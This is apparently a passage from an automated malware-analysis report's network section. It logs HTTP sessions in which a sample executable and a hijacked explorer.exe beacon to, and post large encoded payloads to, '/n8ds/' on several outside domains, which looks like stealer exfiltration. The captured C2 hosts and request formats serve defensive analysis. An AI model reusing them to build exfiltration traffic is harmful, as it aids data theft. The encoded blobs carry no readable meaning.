                                                                                                                        Data Ascii: Zc5Ram6qtKYt8fHFMYBH5mTLVXdxefUIsmpsJEeMal81vsenQnJnYPwcupL6NhLswsqnaRpdDHmqP07QlSfcNYnAJF0Xwf76Ax0i6q(FnmXcdL~u5hygk0E7pUNmt50iFlk6JEQ6wlLlxqt2VO10i4IswT~P26mhd-Zy(Gm7LUWyJ7hNIptCTE3wm0OSNbuDGIl3EhVbyILXsdg9ro2NDy7KHvR1DCHp~F0KLOZtC8OGItiKFSH
                                                                                                                        Nov 25, 2021 13:00:58.957299948 CET6524OUTData Raw: 72 45 4d 72 4b 5a 6c 66 4a 76 75 37 58 75 36 6f 4e 37 6a 41 7e 69 32 68 32 6a 31 6b 62 4e 73 7a 4d 35 45 6c 42 66 61 56 45 4c 50 43 54 56 36 36 67 54 43 59 39 32 72 66 4e 7a 64 5f 47 63 7a 33 4f 37 78 5a 37 52 70 4e 79 75 28 57 5a 66 69 64 4a 67
                                                                                                                        Data Ascii: rEMrKZlfJvu7Xu6oN7jA~i2h2j1kbNszM5ElBfaVELPCTV66gTCY92rfNzd_Gcz3O7xZ7RpNyu(WZfidJgaKyezMZtev2rF1B5uaWQzeXtFEF2lWrHW7NLfQULKFu37ikIn3A6QviLaASKGH2Q5H6REmHiZJNHErOMVqKk3nqpdDBVypS0aHiLHlEeQyT-uMBUqcW6Sewol5epEJ~2nogplwMhMFi0p7k4tquseiVvCNPJBxJH2
                                                                                                                        Nov 25, 2021 13:00:58.957483053 CET6533OUTData Raw: 4d 50 56 70 54 76 33 69 6c 50 4d 4d 4e 4c 66 6d 7e 39 4d 50 44 4b 49 72 28 72 67 38 37 46 65 31 72 54 4f 4a 49 7a 44 54 61 76 6f 72 66 72 58 50 6f 39 31 4d 72 46 6a 56 44 43 53 43 6e 41 50 30 4e 2d 61 4a 55 6f 6c 6b 52 63 46 31 45 6e 33 6d 72 54
                                                                                                                        Data Ascii: MPVpTv3ilPMMNLfm~9MPDKIr(rg87Fe1rTOJIzDTavorfrXPo91MrFjVDCSCnAP0N-aJUolkRcF1En3mrT1LJWcTTWNDBGY9kDtYftL65Gy1XWYPeRsf8ckaB4OBNIhgQQisOmFJCJsB0KjbsYTus6HnwGQS6hqM0LJLWZL0HctIq6Iq33tKM64UK5T8F2CvYSxtTsKo1YTxE29pczAqSd3qktRjpN4LpE(t1Dfnlj9TDQ4Ghm8
                                                                                                                        Nov 25, 2021 13:00:58.957855940 CET6533INHTTP/1.1 410 Gone
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 25 Nov 2021 12:00:58 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        2192.168.11.2049840107.6.148.162443C:\Users\user\Desktop\Zr26f1rL6r.exe
                                                                                                                        TimestampkBytes transferredDirectionData


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        20192.168.11.20498363.64.163.5080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 13:00:58.958116055 CET6534OUTGET /n8ds/?6ldD=4XwYGzmPDVH3THQXSPknmfdazTodAXDlHas2KNX7n/UXs4ghRUZWEGvkVm0hYsfSCvUh&v6Mt=3fxxA4Z HTTP/1.1
                                                                                                                        Host: www.inklusion.online
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 00 00 00 00 00 00 00
                                                                                                                        Data Ascii:
                                                                                                                        Nov 25, 2021 13:00:58.969938040 CET6535INHTTP/1.1 410 Gone
                                                                                                                        Server: openresty
                                                                                                                        Date: Thu, 25 Nov 2021 12:00:44 GMT
                                                                                                                        Content-Type: text/html
                                                                                                                        Transfer-Encoding: chunked
                                                                                                                        Connection: close
                                                                                                                        Data Raw: 37 0d 0a 3c 68 74 6d 6c 3e 0a 0d 0a 39 0d 0a 20 20 3c 68 65 61 64 3e 0a 0d 0a 35 30 0d 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 72 65 66 72 65 73 68 27 20 63 6f 6e 74 65 6e 74 3d 27 35 3b 20 75 72 6c 3d 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 2f 27 20 2f 3e 0a 0d 0a 61 0d 0a 20 20 3c 2f 68 65 61 64 3e 0a 0d 0a 39 0d 0a 20 20 3c 62 6f 64 79 3e 0a 0d 0a 33 63 0d 0a 20 20 20 20 59 6f 75 20 61 72 65 20 62 65 69 6e 67 20 72 65 64 69 72 65 63 74 65 64 20 74 6f 20 68 74 74 70 3a 2f 2f 77 77 77 2e 69 6e 6b 6c 75 73 69 6f 6e 2e 6f 6e 6c 69 6e 65 0a 0d 0a 61 0d 0a 20 20 3c 2f 62 6f 64 79 3e 0a 0d 0a 38 0d 0a 3c 2f 68 74 6d 6c 3e 0a 0d 0a 30 0d 0a 0d 0a
                                                                                                                        Data Ascii: 7<html>9 <head>50 <meta http-equiv='refresh' content='5; url=http://www.inklusion.online/' />a </head>9 <body>3c You are being redirected to http://www.inklusion.onlinea </body>8</html>0


                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                        21192.168.11.2049838203.170.80.25080C:\Windows\explorer.exe
                                                                                                                        TimestampkBytes transferredDirectionData
                                                                                                                        Nov 25, 2021 13:01:15.913723946 CET6719OUTPOST /n8ds/ HTTP/1.1
                                                                                                                        Host: www.mackthetruck.com
                                                                                                                        Connection: close
                                                                                                                        Content-Length: 131142
                                                                                                                        Cache-Control: no-cache
                                                                                                                        Origin: http://www.mackthetruck.com
                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                                        Accept: */*
                                                                                                                        Referer: http://www.mackthetruck.com/n8ds/
                                                                                                                        Accept-Language: en-US
                                                                                                                        Accept-Encoding: gzip, deflate
                                                                                                                        Data Raw: 36 6c 64 44 3d 75 52 32 58 78 37 68 56 58 5f 62 50 4b 2d 6a 44 30 33 63 4a 50 36 55 43 79 75 38 56 4e 77 43 75 4f 2d 4d 41 46 6d 7e 32 35 31 7e 62 4e 35 52 4a 55 52 53 50 69 59 78 6d 4e 6f 4a 56 74 4c 55 67 30 7a 52 37 6a 75 53 78 34 69 59 2d 47 52 42 47 59 72 63 2d 33 33 63 49 47 49 30 59 55 79 7e 6a 62 57 7a 70 7e 75 58 41 63 74 7a 4d 32 6c 79 39 55 6c 30 38 28 4e 34 56 28 32 41 57 77 49 44 4c 62 35 7a 5f 53 31 34 37 66 71 45 34 6b 2d 56 4c 78 45 67 6a 49 4d 54 64 6d 36 71 6f 61 38 45 30 33 73 53 33 6f 71 72 6b 53 32 31 66 5a 57 47 50 61 68 41 58 53 34 53 42 58 46 58 52 6b 64 7e 6a 61 6a 5a 41 7a 49 65 34 6e 43 47 68 77 64 35 42 32 64 52 74 65 37 6b 6a 69 78 4e 62 58 6a 53 54 58 52 4e 2d 68 71 37 43 44 50 78 46 6a 43 79 58 78 64 5a 75 77 5a 5a 46 58 32 6b 70 77 47 75 33 74 47 51 6b 51 7a 54 38 37 48 38 6e 71 61 61 65 75 65 34 65 73 52 4c 57 67 67 6a 74 79 37 68 52 34 65 47 46 44 76 54 48 28 31 75 78 43 53 51 63 30 58 64 34 44 54 47 32 64 62 59 4f 54 65 54 75 74 47 73 31 45 73 30 38 43 38 53 2d 39 6b 62 57 32 52 76 66 56 4f 50 74 4a 42 50 78 68 6f 48 4b 41 6a 4f 56 4e 52 46 67 4e 52 61 71 58 51 49 42 33 36 33 59 44 44 6c 39 73 4b 35 38 43 76 7e 66 58 36 42 63 31 37 4c 4c 38 5a 54 5f 7e 74 41 46 51 58 4c 64 63 73 79 56 70 6f 48 55 52 31 7e 50 31 62 6d 6f 75 32 6a 32 77 30 56 65 62 49 4f 39 73 4f 77 6d 73 77 44 43 69 4c 6f 78 48 76 6e 2d 64 6e 44 6f 54 66 4f 4a 79 56 35 32 66 42 36 30 71 73 45 43 76 74 6e 43 69 52 42 4d 59 58 54 55 51 6e 73 4a 5a 63 79 36 55 79 33 4e 4f 2d 62 62 71 2d 33 76 55 75 30 47 47 67 6d 6e 73 38 53 55 36 68 6f 57 36 52 4c 56 48 39 6a 4e 28 75 44 51 65 30 52 6d 38 58 7a 41 41 61 63 5a 4d 4a 51 61 49 31 43 73 68 65 76 46 34 6c 34 65 30 69 39 42 4d 4f 47 59 5a 59 50 67 38 5a 47 6f 64 72 50 6f 32 4d 77 4b 6a 33 70 65 64 49 4c 31 5a 30 32 76 44 37 44 57 31 77 68 54 44 4e 6c 7a 7a 6f 6a 50 46 66 66 79 32 74 6a 75 57 72 76 48 57 42 77 2d 4c 76 78 6d 72 39 64 42 34 53 4b 78 62 43 57 6e 4d 51 31 45 6e 72 6f 5f 78 6c 58 6c 4a 59 4c 69 7a 50 68 49 65 69 6e 44 76 44 59 6a 4a 6e 32 38 43 5a 49 45 30 43 32 53 41 52 77 2d 57 39 69 49 55 68 78 57 47 68 6f 75 38 77 31 7a 39 6f 4d 76 32 5f 53 46 4e 74 72 34 69 6e 38 46 52 41 5a 4f 6d 74 59 42 57 6d 30 6b 53 45 63 73 48 50 33 71 31 4e 6d 33 75 69 54 4b 73 36 57 30 7e 6e 73 67 63 61 72 66 48 54 74 6a 37 2d 70 4a 63 41 7e 68 6f 41 49 43 58 38 44 6b 36 61 7a 7a 77 32 56 38 4b 42 47 6d 76 51 6c 6b 31 64 74 61 68 44 39 6b 35 4c 4a 76 54 70 76 44 47 71 76 4d 39 52 72 41 47 4b 46 4d 38 71 56 42 30 50 4b 4c 4b 58 6a 34 47 45 68 6f 58 67 62 45 7a 39 46 33 6b 4f 5a 36 4b 56 34 50 79 45 28 6c 6a 4c 48 45 6a 5a 32 76 4a 48 69 4f 30 69 5a 55 4b 57 63 67 67 50 7a 76 74 71 51 35 49 57 58 53 38 38 4c 6d 72 75 64 53 44 59 74 33 76 52 4c 36 54 58 77 30 54 7a 33 2d 63 6b 6a 47 53 53 57 63 63 35 4c 67 62 75 63 45 43 58 4a 6e 6f 59 74 42 30 58 76 78 43 52 69 68 62 37 33 34 30 4c 6f 56 6c 4c 48 73 4b 67 50 4c 79 43 53 48 46 36 6c 4d 28 70 41 53 63 6e 7e 55 51 39 78 37 48 79 37 45 34 58 7e 44 36 58 34 38 71 42 4e 51 64 4d 73 59 64 71 64 38 68 59 51 61 63 33 51 36 41 44 6b 5a 59 66 53 63 58 52 52 6d 58 4f 38 34 45 6a 59 67 4a 63 4c 69 45 31 71 6b 44 39 48 4b 70 39 41 57 78 7a 4c 68 5a 48 70 39 62 30 61 58 49 56 65 79 5a 50 39 6d 58 5a 74 64 6a 4c 4c 73 28 4f 34 39 75 77 41 4a 43 69 54 36 78 4b 46 68 69 38 64 76 44 62 6d 53 35 58 52 4d 4b 67 66 67 50 34 62 65 38 4c 71 6d 33 5f 4e 76 6b 32 37 62 50 7a 75 57 28 74 48 71 4a 54 73 34 30 49 38 49 79 76 78 77 38 6e 67 67 47 76 53 5f 56 71 75 49 78 69 4c 69 53 53 57 48 35 79 77 4b 58 64 4a 56 66 77 75 50 71 56 54 45 6d 6b 4e 33 7a 31 73 34 33 4b 71 76 7e 49 58 5f 58 6a 6d 54 52 47 76 51 42 70 66 69 4d 77 49 69 69 73 68 62 62 77 65 42 59 79 54 43 7e 6b 4f 75 32 6b 38 68 67 64 57 67 4d 30 63 46 28 6a 4d 2d 45 75 63 64 52 4e 48 51 44 51 44 49 6f 54 5a 44 4f 71 56 54 50 58 77 63 77 55 4e 49 7e 55 78 58 55 45 5a 42 56 42 59 41 64 58 41 4b 6a 30 57 58 4b 32 74 68 71 35 64 6a 4e 70 4f 4b 50 33 71 77 52 64 35 51 4d 56 52 37 43 31 5a 7a 36 4b 55 59 6d 39 69 6b 77 62 75 62 41 73 65 77 6f 70 5a 35 28 55 31 79 77 77 7a 41 6b 79 74 48 38 52 69 62 73 4b
                                                                                                                        Data Ascii: 6ldD=uR2Xx7hVX_bPK-jD03cJP6UCyu8VNwCuO-MAFm~251~bN5RJURSPiYxmNoJVtLUg0zR7juSx4iY-GRBGYrc-33cIGI0YUy~jbWzp~uXActzM2ly9Ul08(N4V(2AWwIDLb5z_S147fqE4k-VLxEgjIMTdm6qoa8E03sS3oqrkS21fZWGPahAXS4SBXFXRkd~jajZAzIe4nCGhwd5B2dRte7kjixNbXjSTXRN-hq7CDPxFjCyXxdZuwZZFX2kpwGu3tGQkQzT87H8nqaaeue4esRLWggjty7hR4eGFDvTH(1uxCSQc0Xd4DTG2dbYOTeTutGs1Es08C8S-9kbW2RvfVOPtJBPxhoHKAjOVNRFgNRaqXQIB363YDDl9sK58Cv~fX6Bc17LL8ZT_~tAFQXLdcsyVpoHUR1~P1bmou2j2w0VebIO9sOwmswDCiLoxHvn-dnDoTfOJyV52fB60qsECvtnCiRBMYXTUQnsJZcy6Uy3NO-bbq-3vUu0GGgmns8SU6hoW6RLVH9jN(uDQe0Rm8XzAAacZMJQaI1CshevF4l4e0i9BMOGYZYPg8ZGodrPo2MwKj3pedIL1Z02vD7DW1whTDNlzzojPFffy2tjuWrvHWBw-Lvxmr9dB4SKxbCWnMQ1Enro_xlXlJYLizPhIeinDvDYjJn28CZIE0C2SARw-W9iIUhxWGhou8w1z9oMv2_SFNtr4in8FRAZOmtYBWm0kSEcsHP3q1Nm3uiTKs6W0~nsgcarfHTtj7-pJcA~hoAICX8Dk6azzw2V8KBGmvQlk1dtahD9k5LJvTpvDGqvM9RrAGKFM8qVB0PKLKXj4GEhoXgbEz9F3kOZ6KV4PyE(ljLHEjZ2vJHiO0iZUKWcggPzvtqQ5IWXS88LmrudSDYt3vRL6TXw0Tz3-ckjGSSWcc5LgbucECXJnoYtB0XvxCRihb7340LoVlLHsKgPLyCSHF6lM(pAScn~UQ9x7Hy7E4X~D6X48qBNQdMsYdqd8hYQac3Q6ADkZYfScXRRmXO84EjYgJcLiE1qkD9HKp9AWxzLhZHp9b0aXIVeyZP9mXZtdjLLs(O49uwAJCiT6xKFhi8dvDbmS5XRMKgfgP4be8Lqm3_Nvk27bPzuW(tHqJTs40I8Iyvxw8nggGvS_VquIxiLiSSWH5ywKXdJVfwuPqVTEmkN3z1s43Kqv~IX_XjmTRGvQBpfiMwIiishbbweBYyTC~kOu2k8hgdWgM0cF(jM-EucdRNHQDQDIoTZDOqVTPXwcwUNI~UxXUEZBVBYAdXAKj0WXK2thq5djNpOKP3qwRd5QMVR7C1Zz6KUYm9ikwbubAsewopZ5(U1ywwzAkytH8RibsKcEmA32gWPRYcjmrePvorv6bbhfBrXFXy994PUj1QSBttvtwJDpiAWlU4XYEQVevxWwiOCwPdu-EZZ5KvKxeTz85fLBoquGm2PYkAVBd-m62EUyI0dtcP9KFHW67FcnrJYtYMnqHl0o(wDSm4isGlva5HRqhlZCqIG8fHObMaHQGtkDJboegdsu63dYd8YjVq6lTKZqg_qzESLquTb4eW9qIfiG8x652xZaqyuPc3R8cC2aZ3uYg7(hL7bO1IUbVvSL962MXHmn7U8-4j2pBbyNjbJEK_LQzIZfRDx2m51YFK8EOa8lFBfYXqVfZLGrOZuDGJoVVkmq1k4Qw8wUgQk87gFENk(CYnIkCaqcamOb~czXDW0EyHff7oYxIEfaWQsocrRXO6xjxIoaKNGsF-DC~-bppdBykgumTy62Ibd4OFPIHleAERWYhp972DmfmV2CfZFZ0ntbVhzian0MqdzkGh~cyHy0arfQHpTNOtKFHglNlprU05ROfSgBGpcJOUAyjQd3IUQRLT99ZkyxqAF8L11vzglotKZpxthL9Eu8KfNQk6oJiqNrfwtwxr9CC4zzL0Y_jey7HYydE92gvrSE2eKRX9VhHgTwN0TDz3DLydvHa0M8Pf71y9JZra7QWPqmlMGraM6Cyto2wQaVVvLqoZdtokptN8lIAoiKg7k91F4GW6a63iApDik1LFeXSglfQ-lNfC2s0tW_Pm7T6PfC90~kZQdSgLVtOWN_ZIqT4mjMjBxJJymT7JodskrLQz6P5a1FZpIXgPVI7jseSRDthBPt1ccUGVBjEhFZ11vOHHXtaj4cJ2ruiNbM2coZ3weryWvZkcy6d_2jPqvigWCwV-G0qB8ISM2OpMjtZLIytE9aup0PN3E69QszL6F8WFTx6iTYXu670hgO1x71nArfFAj61piOfYvXGJkLE-SC3_7syo7wZeWeO3Yyso7kVZE2v7V4p7RjnSQbbgLOQ-VOvLc-hrhRvHPxF2VttHitf69tigyU2fML1Yt1mBMu(FTDGUEqCMXXjSfQPiIv5G5dLt7PL7ctuEk2mfvaaGLKL_2Af9kPTCagGBEy7ufzjyTHuEZ-7u7ufBdyQrNT(OPNSQWVy1r9g6KpvO3QMc2_LEjvNYGDxEH5AqHqxeeoJTDReHRPFxKH5_Wf8kBUITV05qu2ZkbhyoL0mKZ415Jro7I1l12bYh0qX5(w6VlJiCyt2LvV7NtdlC(MZDYkZlq8WuC_TBW5uK810z2gww5IPC8nrQNAuf(1Dig2pXAY7z7Y8mCLTvhsOeXqPapFav972k5o9SoH7eIy7UWZMCg8svpEB_PRLP5KrhRj~cacnNtjhUM0CwCZsTORgptVdSWr0abTiDPaZ2moVvr4QvVDmaCOAa81VDh5pcLDefoCaAZNhiyUkl(8emobAKvavXBe1Ec7B_uhtPggn5B16lKQO2leOKtNdddb8kz9TH1KpAWXl6hFTRfVd9kbd-zHDvGrKGdHQv7k7rcJ~lrTdGwuIVWaz2MrkdAawZNHDZAK9C2e(1wMhSdI8G6MVDSnokRjKVJBwjpVPtlhO8uqDL7XjSxLelz51dYQmoWLxDztjGAzvA4UjTpqHQi4x5X4Qk~vn17w7FRqzfKE2nknbg9GzdLqoBwD(4AnYjmy1RWte5DAHWMjwysDLfIJW2TG6XDhK-hmn7awIYWZ28kG4L5KvHmhAt8nDT1wFaABXVfV(ABONv6MP2nLZUnT3ghD(dw_eKoJJ23sqtsbNtb2(bOunzPuteaLHouqefZ7(5ulN49BPZIQaU1FAz3ZHzmmjrlOgrfUvtyg9qXVpvZNhS1X~6V6L_4f(lUyL4yOiTF9bI8iNFX7hAzR5j(zZzObC0~wjXe2zDPY0CTPYiphE8BShAq0xZw5oT0IHl5oDRxAgDfMKoMSSYIVAS0T9Qs3YGs-lInLBLsrcQ71qb(vjlD-dP(jB9T_7hRsVpVSWKe1RkNTIwydg_QDpOLASHLsmTMIPOZPP5SiKS47AdQjLRdSby5TiK~nIyyfS4x0fDFsNZbSGlq9Z4I28kvQnYQrNbWRAXLAwiBjKTR26_rNbe1_ky673nZtM6BT7I9Kfa(Kph3LpgC83soLtFpeFh8EF4UmzQQivdRvKjL4jhlsWsphoa3fIeLnxok1EEwJ(cxiy2QkwY4n5MBbKSHIV_voB2wFb6dADzWc60a_bINyjM~DoQ9GNlZe29biXwpPyO1kRJy55Nj9RmJcNEldYwmRavQ5mbqbay9rhpwX0-PTp4HuqtSiXa4hPqNy9IyRSDmEa_gUX4(K3K1fi6fIAiXNUc0Sma9Udp2caHPCti1yUOEjaYIrMSEnJFi4NDk_wElzRnilI8eBgg7EJXhN7yMb7FiBaUdu08c_D30gMd4VdXW_unlbqzjcQWTKYFSdY2EoLUo2VyEWq6L0(lc67f9QF6cywnv5qiglodXc4nnv5LT31aJCwAL2F4T7oMdt01McBcW5zU7ZZ7wKwMyMhB9yDF2uAEsCu1b-OW4xgGCMtX6gD6memE0_TV6Glxe4(QjkjshqUtK0lry0Kh(tnq5Szg6yWr2YgVhnoddSVtTa56PY2R6IcMIP~Vpkta3iPy7LShLTF67PfZo6Tn4JXF~QhsVOUye7w6s-HBDfdLgdGKXKocpR0ev0i5SxRZ48wru3qhDR7Ju6Fbku9NdFi8KOe9vUv5oPngkjs9no(
                                                                                                                        Nov 25, 2021 13:01:15.913800955 CET6726OUTData Raw: 5a 62 50 4f 31 4e 72 6d 38 4c 72 6f 33 6b 55 4c 7e 33 58 51 6e 4e 32 6a 64 33 7e 41 34 41 6d 34 4b 2d 71 57 55 64 57 64 67 4b 44 70 79 77 43 75 41 66 53 48 7a 33 71 49 79 59 66 4d 6f 33 43 76 44 39 50 41 49 42 6b 61 4a 73 4b 6b 43 52 37 32 6f 4f
                                                                                                                        Data Ascii: ZbPO1Nrm8Lro3kUL~3XQnN2jd3~A4Am4K-qWUdWdgKDpywCuAfSHz3qIyYfMo3CvD9PAIBkaJsKkCR72oOZl1nAc9l33yFjQ9DHfIVQIVxK0~3g-gKdeB3DaRmL6Pi~Nq6HxCm8crdNcI9dtT9eC8a3nDs0nuBwlmpBchc9093(PyRps(9P52-oGN8wfpkPWg1mP2EUy~Nqd(Bxya-Eb94PqBPl3gZbwSNPtqDhobREKxxj5qnC
                                                                                                                        Nov 25, 2021 13:01:16.195851088 CET6729OUTData Raw: 61 67 47 65 58 2d 28 30 4e 36 51 44 76 31 7a 6a 4b 63 64 5f 70 38 6d 65 57 66 67 79 51 79 35 33 49 6c 6a 74 4c 38 32 64 47 4c 51 5f 54 32 28 4d 49 6c 6d 34 50 49 65 79 6d 7a 7e 41 77 38 71 52 6f 52 66 75 41 37 33 79 7a 68 44 76 76 79 4f 33 38 31
                                                                                                                        Data Ascii: agGeX-(0N6QDv1zjKcd_p8meWfgyQy53IljtL82dGLQ_T2(MIlm4PIeymz~Aw8qRoRfuA73yzhDvvyO38196iZmqeaRnv1TjltLPrXpscHOCBSiBriN8jkZuGDDojEyLgxn4SFy4DvJIDqQZDyC_S2fU4ArK(d~IkNXTAqjx4hqWOkOz8NIIO2~2JClHf0J6A_piir(3VO81xtsJXVkwlxg2l8ukw7f4ysKfRuqRZev64EgBsB~
                                                                                                                        Nov 25, 2021 13:01:16.195983887 CET6734OUTData Raw: 67 53 47 65 30 79 38 37 64 39 32 30 6d 72 32 42 34 2d 65 6d 5a 78 33 76 51 42 4c 77 44 73 54 57 4c 7a 33 57 45 36 28 41 30 6d 74 46 68 74 43 5a 7a 69 74 2d 45 37 52 49 32 79 58 48 4e 2d 6e 67 58 76 68 71 35 70 39 53 42 4f 5a 61 68 71 50 46 6b 67
                                                                                                                        Data Ascii: gSGe0y87d920mr2B4-emZx3vQBLwDsTWLz3WE6(A0mtFhtCZzit-E7RI2yXHN-ngXvhq5p9SBOZahqPFkg5-a8kRUxy8BoChzIDG10BYTvebm2O_mxxcRbJuLdtSWY3S3H8zDwFZJ0Ly~W6ehrfp0DBQ~GNzWzBpW22zEV0Kd2WmbcwzE5hmfxbfhJJVph799F1sQuxLCv89CBtBiuVbjEalWwakb85v4tSUdc(W6c02do7WtUn
                                                                                                                        Nov 25, 2021 13:01:16.196217060 CET6745OUTData Raw: 45 4c 34 69 6d 73 4b 35 69 54 5a 65 4c 4d 57 2d 4c 34 53 42 79 71 43 55 58 6e 76 6f 43 36 49 50 50 45 43 79 63 72 45 38 33 42 42 6a 59 6e 46 37 45 73 32 48 6e 6f 7a 76 4d 37 6d 7a 75 39 31 42 62 59 33 6f 4c 64 4b 59 45 48 74 34 74 37 59 50 61 54
                                                                                                                        Data Ascii: EL4imsK5iTZeLMW-L4SByqCUXnvoC6IPPECycrE83BBjYnF7Es2HnozvM7mzu91BbY3oLdKYEHt4t7YPaTDc~KXExOJoOnGAF-SO21G1Hr8nGe09ThtK(cLqscfW0HRBi9LHsZRtDBsELHyQoZ16ua5QcbgoRaGXdXh6mzMOoRc4v26apEdaf1xHwGgDcSKMGTDKN_VuRdJpJf5ea-rNk1WnuVLGXJD39Oi3Iresta5cojbJl8C
                                                                                                                        Nov 25, 2021 13:01:16.196336985 CET6753OUTData Raw: 58 47 64 68 6b 6b 39 50 61 58 31 57 33 74 33 63 47 6a 47 58 43 58 4f 64 78 77 71 53 76 33 47 43 39 6a 71 6e 6f 4a 64 59 70 54 41 38 53 6a 4e 48 35 4d 37 31 41 4c 43 48 61 2d 4e 46 74 39 35 70 38 56 48 53 36 4f 54 67 47 79 66 4f 69 56 78 37 6e 66
                                                                                                                        Data Ascii: XGdhkk9PaX1W3t3cGjGXCXOdxwqSv3GC9jqnoJdYpTA8SjNH5M71ALCHa-NFt95p8VHS6OTgGyfOiVx7nfhl~9tbOJM8MUtpeuUj9EX42FKeJYJvTgiQTfyvniikn7l_U8kqHQ4WA83syceO0TTFQ58Gpc2pOQFiklUhUTu4B2IzXZq02lNEzCFPUxP6slFbIsEjBb1-9mT_OUf89RVDPUoQT7XVD4Fnhu22qw5qES4pqu0qs5z
                                                                                                                        Nov 25, 2021 13:01:16.475429058 CET6756OUTData Raw: 37 48 65 4a 34 2d 74 58 28 42 74 6a 68 69 6c 58 6f 7a 51 47 48 5a 58 47 65 54 4c 64 76 5f 64 34 35 78 45 54 5a 66 55 68 7e 6d 36 53 39 38 31 5f 5a 65 72 6d 4e 6e 44 5f 33 48 73 61 4f 57 6f 34 47 4a 50 7a 51 62 69 78 36 52 6e 30 67 6c 64 70 67 44
                                                                                                                        Data Ascii: 7HeJ4-tX(BtjhilXozQGHZXGeTLdv_d45xETZfUh~m6S981_ZermNnD_3HsaOWo4GJPzQbix6Rn0gldpgDIiHWBLApfCIaatZJjMGpIH~vaYjiWL2daeuJ6ELkOrSgbzTYICICzGJILF1z~p4xBI9zesDHSAO81W2Wxk9J71kHDJw9e6nPpBikCIHeUABrp_WSL8l5s1oM3byS20WV1NzsZSWcus8Q4Uqaci0jYvl-JsCzKuHdr
                                                                                                                        Nov 25, 2021 13:01:16.475545883 CET6759OUTData Raw: 4d 46 36 44 68 67 77 51 35 4b 6c 63 62 61 66 53 6c 78 45 6e 43 38 6e 2d 37 53 4e 41 66 50 73 58 53 79 4b 54 34 4b 55 67 64 52 57 6a 73 5f 65 52 48 66 76 4f 55 57 56 65 33 31 7e 72 6f 75 65 70 54 34 28 75 46 57 76 75 6c 48 48 32 47 62 33 4c 56 4c
                                                                                                                        Data Ascii: MF6DhgwQ5KlcbafSlxEnC8n-7SNAfPsXSyKT4KUgdRWjs_eRHfvOUWVe31~rouepT4(uFWvulHH2Gb3LVLWZdZ7sSu63zwRxJ48sIdVfntSorFqmDdlZvjAE0Dk-Ku3oE80LDguMb-AswCG-IQgsTnLvOHsr6VrP8aL8ayxtqNpUaCzXmfxmmvgRIouV2-5aI3GRAgLIGnDQ52TJvJgtXxPnZvqHSrPKzF9d98nfqGVGETnq8pC
                                                                                                                        Nov 25, 2021 13:01:16.483793020 CET6762OUTData Raw: 74 62 32 7a 34 52 63 66 4c 35 4e 48 41 78 36 4a 6b 76 52 61 6d 66 59 69 56 4f 48 34 4b 49 53 6a 74 35 35 4a 4b 49 53 46 74 4a 38 6f 55 70 42 35 54 44 70 53 6c 31 4e 66 69 6b 59 67 6d 75 6c 72 77 53 54 74 6e 76 4b 78 57 44 62 37 6b 57 6d 7a 4b 2d
                                                                                                                        Data Ascii: tb2z4RcfL5NHAx6JkvRamfYiVOH4KISjt55JKISFtJ8oUpB5TDpSl1NfikYgmulrwSTtnvKxWDb7kWmzK-9vBJrkrRFNSNM_5mZtzEv2mt4aH42AlSeXUVIi1ItXuaoBckvC4H7eqjY1Aacagmxor16ftryeq_5ptqhTDc1jJBCEq8UjElUbsvS6VNi_jr5G55ONb3YGv1UeavFXckxh86xLQwnzkx5akzLFpdsMMqlNvBnwj0W
                                                                                                                        Nov 25, 2021 13:01:16.483922005 CET6764OUTData Raw: 49 37 45 51 4c 64 77 50 49 31 36 73 57 57 59 78 75 6c 63 73 6b 6e 6d 6e 31 2d 44 42 77 61 50 2d 6f 50 44 4c 6f 36 62 47 45 65 71 4d 53 79 74 78 6c 58 67 42 30 69 37 5a 67 74 79 6f 33 6c 52 50 78 65 66 68 32 4e 63 54 68 61 55 63 43 56 79 36 68 36
                                                                                                                        Data Ascii: I7EQLdwPI16sWWYxulcsknmn1-DBwaP-oPDLo6bGEeqMSytxlXgB0i7Zgtyo3lRPxefh2NcThaUcCVy6h64GVNtSsGgjFSYlpWxsiK1dWJr8vwkRZNEqGtVT9Gpvg8dhn_YQd-IfSkzwLvZDCSSOtF(5R05mAbPjYOYqlJDPRcBs2j064wix5PvnUELA0XJxmDCBo0T-werlZqDtmsIKo0W4mcsLsuXhVgQDIWj0Nb0YToDARev
